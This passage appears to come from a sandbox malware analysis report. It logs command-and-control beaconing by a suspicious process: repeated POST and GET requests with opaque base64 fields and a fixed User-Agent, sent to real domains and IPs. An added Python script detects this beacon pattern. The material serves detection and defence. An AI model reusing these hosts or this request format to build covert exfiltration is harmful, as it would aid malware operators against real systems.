                                          Data Raw: 59 62 43 4c 3d 33 41 52 4a 70 41 4f 43 46 54 64 57 33 79 4a 38 31 72 44 4b 46 49 51 59 79 45 2f 52 53 42 6a 38 57 79 75 69 30 70 2f 46 46 48 7a 4c 66 45 79 68 48 6b 48 4e 36 41 56 6d 6f 53 62 35 44 36 32 43 72 48 6f 64 51 6a 4d 2b 44 74 58 36 47 79 77 34 6b 30 6b 6b 73 64 63 68 62 6d 45 6c 35 33 56 2f 68 43 2b 30 46 6d 50 7a 68 45 4a 45 54 4e 59 4a 53 48 61 34 57 63 58 33 6e 4e 7a 78 6c 67 6d 46 4f 45 46 59 49 37 32 45 7a 6a 39 61 75 73 42 4f 2b 4a 79 44 75 52 30 50 32 77 36 74 4e 41 50 62 45 46 36 4c 42 64 2f 42 59 59 62 75 75 39 4d 5a 49 6d 38 46 65 61 31 45 32 7a 4f 37 59 47 68 69 76 4c 48 6b 6c 4f 51 4f 67 4f 75 62 62 4a 44 58 56 56 73 76 35 4c 54 38 52 70 48 61 38 52 30 6b 54 5a 35 66 36 67 57 76 45 58 74 5a 53 34 51 63 44 71 64 4c 77 57 68 6c 78 45 62 76 2f 70 42 36 67 4f 4a 2b 6e 75 4c 52 6e 56 37 4d 4f 30 59 57 7a 76 38 44 6f 78 38 55 6c 6f 51 6e 33 31 57 70 6f 67 45 37 56 35 53 31 58 77 38 56 45 6a 76 4e 6a 34 66 30 6d 72 48 73 56 62 7a 4c 6c 52 37 79 32 73 66 59 6f 32 33 35 4e 45 49 54 76 [TRUNCATED]
                                          Data Ascii: YbCL=3ARJpAOCFTdW3yJ81rDKFIQYyE/RSBj8Wyui0p/FFHzLfEyhHkHN6AVmoSb5D62CrHodQjM+DtX6Gyw4k0kksdchbmEl53V/hC+0FmPzhEJETNYJSHa4WcX3nNzxlgmFOEFYI72Ezj9ausBO+JyDuR0P2w6tNAPbEF6LBd/BYYbuu9MZIm8Fea1E2zO7YGhivLHklOQOgOubbJDXVVsv5LT8RpHa8R0kTZ5f6gWvEXtZS4QcDqdLwWhlxEbv/pB6gOJ+nuLRnV7MO0YWzv8Dox8UloQn31WpogE7V5S1Xw8VEjvNj4f0mrHsVbzLlR7y2sfYo235NEITvVQhmOmbpCT1nHQt96q5JUCK1uWjyulrDMBYqy34k65tRtH2I0sCMDIk7Z0dh7R1+hjQaxOPM8btvKUxiiDvIeeCdQ2gOnWZDMgOB1qLlBw5H260SPWl5zoUmAkgwvT0qnZJf/wFUbMsGvVIY6cJm85nOiN9Qh/QvOX34kRFtObjOrypDnOXfF8QiBBky1Txwal5pckY04+VwLi86tS5wvcZyGIoRyrf+HZAWWMl2U/QaXHMTNCvr6mV6pl+cY17nrY5o0TSIf0/CFCwln3BrBXk+4ffdlzj7pgDkT28hLnXO8gPueY2tRM9jKQDH8SmmugL9e7sC2HkY3svYRjYqFrudO7UczLQCKRP1r0DJPGugKi138cUMKOwAFiQGS6kCe9tiNuod9swNIbCSV9mlzyY7bct4m1J/e9Z5uz8OWaqGe96ZmLiGfGs9NQoVQp34XASAFIRZrMSb3XAeCGhPCYnZqY2uXFIcLpWUCDFXMFfuXkdn8McO0o3hm0GbDxmsp7EV1QyUyTnk9eRIrN0HTqa0NSadN5ObBp0NNsG33GoLi4+kc25D3fBur80OHoXo0ZKsBKzMM7Mok8EqO+L1DY/1mbj7KVMLlUTOL9IMGPOIi6PXPXOuKCQ3EIQl7cG5a5wBQllqVmG234K2/92D16A9HweBmgx2gJ [TRUNCATED]
                                          Jul 4, 2024 16:55:32.382322073 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Thu, 04 Jul 2024 14:55:32 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Content-Encoding: gzip
                                          Data Raw: 65 33 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb ec 29 77 a8 82 d0 70 1d df 33 7d cf 75 3c 55 b7 74 75 1d 5f fa 22 50 6e a3 14 46 63 57 85 3d a5 30 d3 40 75 1c d9 28 49 d7 2d 89 5e a0 36 72 79 59 3e 43 8e 22 df b4 c3 10 b3 4c fa 3b 58 49 d6 7a 43 42 34 4c 86 3f ab cb 25 41 2a 84 c6 06 b2 ab ac 2b 06 37 6c d6 43 3b 70 86 51 d3 3a 56 3f ba [TRUNCATED]
                                          Data Ascii: e34Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskk)wp3}u<Utu_"PnFcW=0@u(I-^6ryY>C"L;XIzCB4L?%A*+7lC;pQ:V?~KYGoQ 7hgGRz}u1n,T@z#\-?8dXF0@0LfQ~f5i$<l$!;mc[Ek2SmN4pV+!J);G$R`x/~Em|'y|^%WpHmxax&<X;oo(Y]V0fu43V+uvc+CdbfX<buJF:?iyL[nw2UoxW[,~By3VEt%`Zlh"tS-@` ]G=\b(;XxfG4hm|'V,$tk(U#Dx%^i>s-ku2-P2!uZ<x/$)A-d8)k!d0kggU]UGXo1zwEm_G [TRUNCATED]
                                          Jul 4, 2024 16:55:32.382335901 CEST | 224 | IN | Data Raw: c0 83 46 df d3 f6 e9 ac 13 f3 17 98 d6 35 06 f0 6a c7 6b b9 6a 23 32 b4 87 63 c2 28 f0 bd ee d3 8d 02 5a 06 dc 6d 8a 6a ff 02 7a 11 c2 a0 de c7 f1 3d e0 8c 47 98 62 db 59 ff d5 ca 09 47 6d 6d f2 5c 92 b6 0f de 1b 20 68 7a 0a e3 fe 19 a1 f0 7e f2
                                          Data Ascii: F5jkj#2c(Zmjz=GbYGmm\ hz~%\qy)nT\@)9tJF@o|ZYj!;]har`$C/0N1(~$?<,CfRN>C+@?: 1
                                          Jul 4, 2024 16:55:32.382419109 CEST | 1236 | IN | Data Raw: 41 0b fd 4f f2 21 56 b4 13 3f 80 6c bb 58 08 16 91 dc 16 94 e9 a4 05 c8 7d d8 31 d3 0a 8a a1 b4 e0 1d fc 7f 40 6b cc 82 2b 34 90 7c c2 5a 60 5f 86 96 e2 ef a0 16 b4 fd e1 d7 fb 6f cc 4d d6 60 30 1e b4 da 3f 25 9f a7 66 bd c7 d6 4c 97 c9 24 b4 13
                                          Data Ascii: AO!V?lX}1@k+4|Z`_oM`0?%fL$?Br8!D(<a~agp#$!%@uyL:|dt4SW \-YNG."5ly4(6iF2<$
                                          Jul 4, 2024 16:55:32.382431030 CEST | 1126 | IN | Data Raw: f9 be 12 f7 14 b8 59 a8 8a e9 46 d4 3e 50 38 9a f3 56 a6 3a 5f 3f 32 f5 75 32 16 ee 39 5a 4e 67 ee 38 9b 32 10 74 33 10 e2 ea 15 77 e0 a3 01 2e a2 cc df 8d 54 30 5e 53 2e d8 df 0f ce b9 6e 45 94 65 59 54 a7 67 23 29 36 fc 00 f2 d2 18 0e fa 9f 58
                                          Data Ascii: YF>P8V:_?2u29ZNg82t3w.T0^S.nEeYTg#)6Xtz(9~|I&]ysR^-WELo1[r\%rC5GTI?c}uSr46\`GL,vk"cWA`^F7i%}*ejW<P
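
Sessions 30 to 36 above show the same request shape against each candidate host: a POST carrying one opaque form field, a second and longer POST, then a GET carrying the same field name in the query string, all sent with the fixed User-Agent string Chrome/37.0.2049.0, and with the POSTs carrying Origin and Referer headers that point back at the request's own host and path although no page was ever fetched from it. The following Python script is an added example, not part of the Joe Sandbox report and not code from the sample; it parses HTTP request dumps in the format printed above and reports, per Host, which of those indicators are present. The sample input is constructed from sessions 33 to 36 (headers trimmed to the ones the check uses) plus one ordinary browser request as a control. The path regex, the 32-character base64 threshold, the indicator names and the control request's User-Agent are assumptions chosen here, not facts the report states.

```python
# Added detection example for the beacon shape in sessions 30-36; not report code.
import re

UA_MARKER = "Chrome/37.0.2049.0"                      # fixed across every request above
B64_RE = re.compile(r"^[A-Za-z0-9+/]{32,}={0,2}$")     # assumption: opaque base64-like value
PATH_RE = re.compile(r"^/[A-Za-z0-9]{2,8}/$")         # assumption: /tf44/ and /mooq/ style path

def parse_request(raw):
    """Split a plain-text HTTP request (as the report prints it) into its parts."""
    head, _, body = raw.strip("\n").partition("\n\n")
    lines = head.splitlines()
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    path, _, query = target.partition("?")
    return {"method": method, "path": path, "query": query, "headers": headers, "body": body.strip()}

def split_form(data):
    """Split k=v&k=v without URL-decoding: '+' and '/' belong to the opaque values."""
    fields = {}
    for pair in filter(None, data.split("&")):
        key, _, value = pair.partition("=")
        fields[key] = value
    return fields

def beacon_indicators(req):
    """Names of the indicators a single request matches, in check order."""
    h = req["headers"]
    host = h.get("host", "")
    hits = []
    if UA_MARKER in h.get("user-agent", ""):
        hits.append("fixed-user-agent")
    if PATH_RE.match(req["path"]):
        hits.append("short-dir-path")
    if req["method"] == "POST":
        # Origin/Referer name the request's own host and path: a "form submit" from a page never fetched.
        if h.get("origin") == "http://" + host and h.get("referer") == "http://" + host + req["path"]:
            hits.append("self-referencing-origin")
        is_form = h.get("content-type") == "application/x-www-form-urlencoded"
        fields = split_form(req["body"]) if is_form else {}
    else:
        fields = split_form(req["query"])
    if any(B64_RE.match(v) for v in fields.values()):
        hits.append("opaque-base64-field")
    return hits

def score_hosts(requests):
    """Per Host: union of single-request indicators plus the POST, POST, GET cycle seen above."""
    by_host = {}
    for req in requests:
        by_host.setdefault(req["headers"].get("host", "?"), []).append(req)
    report = {}
    for host, reqs in by_host.items():
        found = {name for r in reqs for name in beacon_indicators(r)}
        if [r["method"] for r in reqs] == ["POST", "POST", "GET"]:
            found.add("post-post-get-cycle")
        report[host] = sorted(found)
    return report

# Constructed sample: sessions 33-36 above with headers trimmed, plus a control request.
SAMPLE_REQUESTS = [
"""POST /mooq/ HTTP/1.1
Host: www.helpers-lion.online
Origin: http://www.helpers-lion.online
Content-Type: application/x-www-form-urlencoded
Referer: http://www.helpers-lion.online/mooq/
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

YbCL=3ARJpAOCFTdW3RB83IbKCoQf4k/Rdhi1Wyii0sTVFV/LfX6hJiTN8AVmuSb9Oa3HrHMRQjcEDvb6HRI4gCIjnNcjRGEm53VqhCuwFmbNhAtET/wJGna7Y8X3nNzDlgm9OEdAI/6UzVRatNhO4qKEmx0LoA7uAFqrD0G/YaPMXq6MpbUaCGsWXLVfqR6zYG0N0oSGvPYd15eVY6TfXQ==
""",
"""POST /mooq/ HTTP/1.1
Host: www.helpers-lion.online
Origin: http://www.helpers-lion.online
Content-Type: application/x-www-form-urlencoded
Referer: http://www.helpers-lion.online/mooq/
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

YbCL=3ARJpAOCFTdW3yJ81rDKFIQYyE/RSBj8Wyui0p/FFHrLf3KhInvN7AVmhyb4D63YrHAZQjQEDvf6HQ441lkkmdchXGEo3XVqhCuwFm/zhEJETPAJGGa4QcXogNzDhgmhOEduI76+zTdatMRO77KDxh0Nmg6PNALEEF22BYCWYbLustJ4Ykg6JatkuTeFPgp42pWeits8qO7/VoybBgN0o4rqIrztxRNcJp1IsGk=
""",
"""GET /mooq/?fhW=BLvXr6e0EhyxeX&YbCL=6C5pq03gIUcCxycao4jVOd5j2ETtSk+CIQvh/K6jTje/eWOGI1u26kAEsQXtCs3elXAZegkYPdXqLAdc1WNGmvwMEDU2l3Vk/j3vF3XZl1x4VY01FUKFB6WA/ZrLtnyfA2FlJPqZ/llT HTTP/1.1
Host: www.helpers-lion.online
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
""",
"""GET /index.html HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
""",
]

if __name__ == "__main__":
    for host, indicators in score_hosts([parse_request(r) for r in SAMPLE_REQUESTS]).items():
        print(host, indicators or "no indicators")
```

Run as a script it prints the indicator list per host; in practice the input would be the request dumps from a proxy log or the HTTP streams of a capture. The form splitter deliberately does not URL-decode: the captured values use '+' and '/' as part of the base64 alphabet, and a decoding step would turn '+' into a space and break the match. Any single indicator is weak on its own (a short directory path is common), so the per-host union together with the POST, POST, GET cycle is what should drive an alert.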


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          36 | 192.168.2.7 | 49743 | 194.58.112.174 | 80 | 6404 | C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Jul 4, 2024 16:55:34.215828896 CEST | 533 | OUT | GET /mooq/?fhW=BLvXr6e0EhyxeX&YbCL=6C5pq03gIUcCxycao4jVOd5j2ETtSk+CIQvh/K6jTje/eWOGI1u26kAEsQXtCs3elXAZegkYPdXqLAdc1WNGmvwMEDU2l3Vk/j3vF3XZl1x4VY01FUKFB6WA/ZrLtnyfA2FlJPqZ/llT HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Host: www.helpers-lion.online
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                          Jul 4, 2024 16:55:34.945995092 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Thu, 04 Jul 2024 14:55:34 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Data Raw: 32 39 38 61 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 68 65 6c 70 65 72 73 2d 6c 69 6f 6e 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 [TRUNCATED]
                                          Data Ascii: 298a<!doctype html><html class="is_adaptive" lang="ru"><head><meta charset="UTF-8"><meta name="parking" content="regru-rdap"><meta name="viewport" content="width=device-width,initial-scale=1"><title>www.helpers-lion.online</title><link rel="stylesheet" media="all" href="parking-rdap-auto.css"><link rel="icon" href="favicon.ico?1" type="image/x-icon"><script>/*<![CDATA[*/window.trackScriptLoad = function(){};/*...*/</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScriptLoad('/manifest.js', 1)" src="/manifest.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script></head><body class="b-page b-page_type_parking b-parking b-parking_bg_light"><header class="b-parking__header b-parking__header_type_rdap"><div class="b-parking__header-note b-text"> &nbsp;<a class="b-link" href="https://r [TRUNCATED]
                                          Jul 4, 2024 16:55:34.946018934 CEST | 1236 | IN | Data Raw: 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 20 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 5f 73 74 79 6c 65 5f 69 6e 64 65 6e 74 20 62 2d 70 61
                                          Data Ascii: /div><div class="b-page__content-wrapper b-page__content-wrapper_style_indent b-page__content-wrapper_type_hosting-static"><div class="b-parking__header-content"><h1 class="b-parking__header-title">www.helpers-lion.online</h1><p class="b-parki
                                          Jul 4, 2024 16:55:34.946033001 CEST | 1236 | IN | Data Raw: 69 74 6c 65 22 3e d0 94 d1 80 d1 83 d0 b3 d0 b8 d0 b5 20 d1 83 d1 81 d0 bb d1 83 d0 b3 d0 b8 20 d0 a0 d0 b5 d0 b3 2e d1 80 d1 83 3c 2f 68 32 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 22 3e 3c 64 69 76
                                          Data Ascii: itle"> .</h2><div class="b-parking__promo"><div class="b-parking__promo-item b-parking__promo-item_type_hosting-overall"><div class="b-parking__promo-header"><span class="b-parking__promo-image b-parking__pro
                                          Jul 4, 2024 16:55:34.946044922 CEST | 1236 | IN | Data Raw: d1 80 d0 b8 d0 be d0 b4 2e 3c 2f 70 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 62 75 74 74 6f 6e 2d 77 72 61 70 70 65 72 22 3e 3c 61 20 63 6c 61 73 73 3d 22 62 2d 62 75 74 74 6f 6e 20 62
                                          Data Ascii: .</p></li></ul><div class="b-parking__button-wrapper"><a class="b-button b-button_color_primary b-button_style_wide b-button_size_medium-compact b-button_text-size_normal b-parking__button b-parking__button_type_hosting" href="https://
                                          Jul 4, 2024 16:55:34.946084976 CEST | 1236 | IN | Data Raw: 2d 6c 69 6f 6e 2e 6f 6e 6c 69 6e 65 26 75 74 6d 5f 6d 65 64 69 75 6d 3d 70 61 72 6b 69 6e 67 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 73 5f 6c 61 6e 64 5f 73 65 72 76 65 72 26 61 6d 70 3b 72 65 67 5f 73 6f 75 72 63 65 3d 70 61 72 6b 69 6e 67 5f
                                          Data Ascii: -lion.online&utm_medium=parking&utm_campaign=s_land_server&amp;reg_source=parking_auto"></a></div><div class="b-parking__promo-item b-parking__promo-item_type_cms"><strong class="b-title b-title_size_large-compact">
                                          Jul 4, 2024 16:55:34.946098089 CEST | 1120 | IN | Data Raw: 26 6e 62 73 70 3b d0 bd d0 b5 d1 81 d0 ba d0 be d0 bb d1 8c d0 ba d0 be 20 d0 bc d0 b8 d0 bd d1 83 d1 82 2e 3c 2f 70 3e 3c 61 20 63 6c 61 73 73 3d 22 62 2d 62 75 74 74 6f 6e 20 62 2d 62 75 74 74 6f 6e 5f 63 6f 6c 6f 72 5f 72 65 66 65 72 65 6e 63
                                          Data Ascii: &nbsp; .</p><a class="b-button b-button_color_reference b-button_style_block b-button_size_medium-compact b-button_text-size_normal" href="https://www.reg.ru/web-sites/website-builder/?utm_source=www.helpers-lion.on
                                          Jul 4, 2024 16:55:34.946110010 CEST | 1236 | IN | Data Raw: 6e 5f 62 6f 74 74 6f 6d 2d 6e 6f 72 6d 61 6c 20 6c 2d 6d 61 72 67 69 6e 5f 74 6f 70 2d 6d 65 64 69 75 6d 40 64 65 73 6b 74 6f 70 20 6c 2d 6d 61 72 67 69 6e 5f 62 6f 74 74 6f 6d 2d 6e 6f 6e 65 40 64 65 73 6b 74 6f 70 22 3e d0 a3 d1 81 d1 82 d0 b0
                                          Data Ascii: n_bottom-normal l-margin_top-medium@desktop l-margin_bottom-none@desktop"> SSL- &nbsp; &nbsp;!
                                          Jul 4, 2024 16:55:34.946122885 CEST | 1236 | IN | Data Raw: 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 76 61 72 20 73 63 72 69 70 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 0a 20 20 20 20 20 20 20
                                          Data Ascii: } } var script = document.createElement('script'); var head = document.getElementsByTagName('head')[0]; script.src = 'https://parking.reg.ru/script/get_domain_data?domain_name=www.helpers-lion.online&r
                                          Jul 4, 2024 16:55:34.946146011 CEST | 1025 | IN | Data Raw: 20 27 6e 6f 6e 65 27 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 3c 2f 73 63 72 69 70 74 3e 3c 21 2d 2d 20 47 6c 6f 62 61 6c 20 73 69 74 65 20 74 61 67 20 28 67 74 61 67 2e 6a 73 29 20 2d 20 47 6f
                                          Data Ascii: 'none'; } } }</script>... Global site tag (gtag.js) - Google Analytics --><script async src="https://www.googletagmanager.com/gtag/js?id=UA-3380909-25"></script><script>window.dataLayer = window.dataLayer || []; f


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          37 | 192.168.2.7 | 49744 | 172.67.210.102 | 80 | 6404 | C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Jul 4, 2024 16:55:40.027987003 CEST | 787 | OUT | POST /lfkn/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.dmtxwuatbz.cc
                                          Origin: http://www.dmtxwuatbz.cc
                                          Cache-Control: max-age=0
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 217
                                          Referer: http://www.dmtxwuatbz.cc/lfkn/
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                          Data Raw: 59 62 43 4c 3d 74 73 66 38 46 4e 69 49 70 4c 75 47 4a 48 55 48 78 52 38 59 45 36 38 77 4a 39 6f 58 65 47 77 6b 44 6e 52 69 4f 31 63 73 42 36 62 39 77 30 77 32 4e 35 37 46 30 41 63 67 51 67 52 6d 34 48 70 41 58 39 31 65 61 76 6d 4c 6c 2f 2b 50 42 66 75 45 39 51 5a 77 35 6a 43 42 32 76 7a 5a 30 6e 33 69 67 2f 79 66 76 61 43 37 4d 63 41 51 2b 7a 61 4e 4c 46 30 57 47 43 32 75 65 5a 44 76 58 77 71 6b 46 61 44 58 77 54 49 6b 4e 57 58 77 50 4d 35 48 6e 78 67 45 50 6c 44 2f 30 51 6a 74 72 35 34 79 44 6a 4e 51 68 64 2b 42 49 39 5a 64 38 2b 38 52 6a 56 39 62 37 4a 47 77 2b 4c 4f 33 48 79 46 34 59 6a 56 36 7a 56 6a 7a 2f 70 4a 54 46 51 2f 76 31 41 3d 3d
                                          Data Ascii: YbCL=tsf8FNiIpLuGJHUHxR8YE68wJ9oXeGwkDnRiO1csB6b9w0w2N57F0AcgQgRm4HpAX91eavmLl/+PBfuE9QZw5jCB2vzZ0n3ig/yfvaC7McAQ+zaNLF0WGC2ueZDvXwqkFaDXwTIkNWXwPM5HnxgEPlD/0Qjtr54yDjNQhd+BI9Zd8+8RjV9b7JGw+LO3HyF4YjV6zVjz/pJTFQ/v1A==


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          38 | 192.168.2.7 | 49745 | 172.67.210.102 | 80 | 6404 | C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Jul 4, 2024 16:55:42.557594061 CEST | 807 | OUT | POST /lfkn/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.dmtxwuatbz.cc
                                          Origin: http://www.dmtxwuatbz.cc
                                          Cache-Control: max-age=0
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 237
                                          Referer: http://www.dmtxwuatbz.cc/lfkn/
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                          Data Raw: 59 62 43 4c 3d 74 73 66 38 46 4e 69 49 70 4c 75 47 4a 6d 6b 48 33 77 38 59 49 4b 38 2f 58 74 6f 58 58 6d 77 65 44 6e 64 69 4f 30 5a 72 41 49 76 39 77 56 41 32 4b 34 37 46 7a 41 63 67 59 41 52 76 38 48 70 39 58 39 78 67 61 74 43 4c 6c 2b 65 50 42 66 65 45 39 6e 4e 7a 34 7a 43 50 69 66 7a 66 77 6e 33 69 67 2f 79 66 76 61 47 46 4d 64 6f 51 69 53 71 4e 5a 55 30 56 61 79 32 68 49 4a 44 76 47 67 71 34 46 61 44 6c 77 58 41 43 4e 56 76 77 50 4f 78 48 6e 67 67 62 42 6c 44 35 71 67 69 76 69 35 64 51 42 44 5a 6f 6e 39 72 56 41 4d 4e 75 77 6f 68 7a 35 33 78 33 6c 59 2b 4c 36 4a 71 42 51 55 59 4e 61 69 52 69 2b 33 58 53 67 65 73 35 49 43 65 72 6a 37 6d 46 42 4e 70 61 32 62 55 41 52 6e 63 6d 64 72 30 43 35 67 49 3d
                                          Data Ascii: YbCL=tsf8FNiIpLuGJmkH3w8YIK8/XtoXXmweDndiO0ZrAIv9wVA2K47FzAcgYARv8Hp9X9xgatCLl+ePBfeE9nNz4zCPifzfwn3ig/yfvaGFMdoQiSqNZU0Vay2hIJDvGgq4FaDlwXACNVvwPOxHnggbBlD5qgivi5dQBDZon9rVAMNuwohz53x3lY+L6JqBQUYNaiRi+3XSges5ICerj7mFBNpa2bUARncmdr0C5gI=


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          39 | 192.168.2.7 | 49746 | 172.67.210.102 | 80 | 6404 | C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Jul 4, 2024 16:55:45.087105036 CEST | 1820 | OUT | POST /lfkn/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.dmtxwuatbz.cc
                                          Origin: http://www.dmtxwuatbz.cc
                                          Cache-Control: max-age=0
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 1249
                                          Referer: http://www.dmtxwuatbz.cc/lfkn/
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
